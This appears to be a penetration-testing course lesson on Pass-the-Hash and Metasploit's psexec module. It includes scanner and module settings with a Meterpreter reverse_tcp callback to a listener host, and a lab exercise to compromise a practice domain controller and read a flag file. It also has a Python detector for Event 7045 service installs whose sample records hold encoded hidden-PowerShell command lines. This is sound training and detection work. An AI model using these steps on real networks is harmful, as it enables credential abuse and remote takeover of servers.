
Fundamentals of Penetration Testing

Psexec and Pass the Hash (PtH) attack on a domain controller

Medium
30 min

Experimenting with NTLM Hash

When you have the NTLM hash of an Administrator user on one server, it is worth trying the same hash (and user) on other servers on the network.

You can do this with Metasploit's auxiliary/scanner/smb/smb_login module. Parameters:

  • RHOSTS: 10.0.0.0/24
  • SMBUser: Administrator
  • SMBPass: aad3b435b51404eeaad3b435b51404ee:62...(fill in)

Remote Access

There are several different ways to use the NTLM hash to take control of a server. We will now look at a method known as "PsExec". Before we dive into that, let's go through DCE/RPC and SCM.

DCE/RPC

DCE/RPC (Distributed Computing Environment/Remote Procedure Call) is a protocol used for communication in distributed systems. It allows data exchange and execution of operations between processes over remote connections. The DCE/RPC protocol is widely used in Windows systems, including for starting services remotely.

In Windows, the DCE/RPC protocol is a key factor in many network services and functions. When a service needs to be started remotely, for example, from another computer or server, DCE/RPC comes into play.

SCM (Service Control Manager)

SCM is a DCE/RPC interface on Windows through which Windows services can be managed. The RPC interface UUID for SCM is 367ABB81-9844-35F1-AD32-98F038001003.

PsExec

PsExec is not an official Windows protocol itself, but a common name for executing commands in Windows by starting a service remotely through the SCM RPC interface. The service can be, for example, "cmd.exe" and it can have a command as a parameter.

The second option is to upload a file to the server through an SMB share and run it as a service, but this is much more likely to be caught by an antivirus system than, for example, running a PowerShell command in memory.

Metasploit's psexec module

There are many remote administration tools similar to PsExec; Microsoft also has its own tool called PsExec, from which the name originates. There is also a version available in Metasploit, exploit/windows/smb/psexec.

Here is a picture of the source code of the psexec module in Metasploit. Note the SCM UUID and the DCE/RPC reference.

The module works as follows:

  • Log in to the IPC share using SMB.
  • Use SCM to start a service that launches powershell.exe and passes it the PowerShell script generated by Metasploit as a parameter.
  • The PowerShell script opens a Meterpreter connection.

If PowerShell is not installed, the module can try an alternative method, such as downloading the binary to disk and starting the service from there.
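Both variants of the technique above leave the same trace on the target: the Service Control Manager writes a Windows System log event 7045 ("A service was installed in the system") for the temporary service, with the command line in its ImagePath. The following is an added detection example written for this page, not code from Metasploit or from the course; the event records are constructed samples and the scoring rules are heuristics assumed here, not an official signature.

```python
import re

# Constructed records modelled on Windows System log Event ID 7045, the event
# SCM writes when a PsExec-style tool installs its temporary service. Sample data only.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "hXkqLzPw",  # random name, PowerShell run in memory
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e ZABpAHIA",
     "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "QwErTyUi",  # binary dropped via the ADMIN$ share
     "ImagePath": r"%SystemRoot%\QwErTyUi.exe", "StartType": "demand start"},
    {"EventID": 7036, "ServiceName": "hXkqLzPw", "ImagePath": "", "StartType": ""},  # not an install
]

RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")                  # 8-letter names like Metasploit's default
SHELL_HOST = re.compile(r"(powershell(\.exe)?|cmd(\.exe)?|%COMSPEC%)", re.I)
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)(\s|$)", re.I)
HIDDEN_FLAGS = re.compile(r"-(nop|noprofile|w\s+hidden|windowstyle\s+hidden)", re.I)
SYSTEMROOT_DROP = re.compile(r"^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.I)  # ADMIN$ maps here

def score_event(ev):
    """Return (score, reasons) for one event; only 7045 installs are scored."""
    if ev.get("EventID") != 7045:
        return 0, []
    path, name = ev.get("ImagePath", ""), ev.get("ServiceName", "")
    score, reasons = 0, []
    if SHELL_HOST.search(path):
        score += 1; reasons.append("service hosted by a shell interpreter")
        if ENCODED_FLAG.search(path):
            score += 2; reasons.append("encoded PowerShell command")
        if HIDDEN_FLAGS.search(path):
            score += 1; reasons.append("hidden/no-profile flags")
    if SYSTEMROOT_DROP.match(path):
        score += 2; reasons.append("binary placed directly in %SystemRoot% (ADMIN$ share root)")
    if RANDOM_NAME.match(name):
        score += 1; reasons.append("random-looking 8-letter service name")
    if ev.get("StartType", "").lower() == "demand start" and score:
        score += 1; reasons.append("demand-start service")
    return score, reasons

def scan_events(events, threshold=3):
    """Return {ServiceName: reasons} for installs scoring at or above the threshold."""
    hits = {}
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits[ev["ServiceName"]] = reasons
    return hits

if __name__ == "__main__":
    for name, reasons in scan_events(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```

On a real host, feed it the 7045 events exported from the System log (or forwarded to a SIEM) and pair hits with Security log 4624 logon type 3 events from the same source to spot the Pass-the-Hash logon that preceded the service install.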

The module settings are the familiar ones.

  • set payload windows/meterpreter/reverse_tcp
  • set lhost 10.0.0.100
  • set lport 1234
  • set rhost 10.0.0.2
  • set SMBUser Administrator
  • set SMBPass aad3b435b51404eeaad3b435b51404ee:62...

Exercise

Use the SMB scanner to search for targets on which the password hash is valid, then break into the domain controller (dc1.evilcorp.local) with the psexec module. In Meterpreter, run the command: type C:\code.txt. What is the code?

Evilcorp - Scenario 1

This is a scenario, please do not unnecessarily close it within the same course area (Scenario 1) so that you do not lose your progress. Please add time if necessary. It may take a few minutes for the scenario to start, please wait patiently.
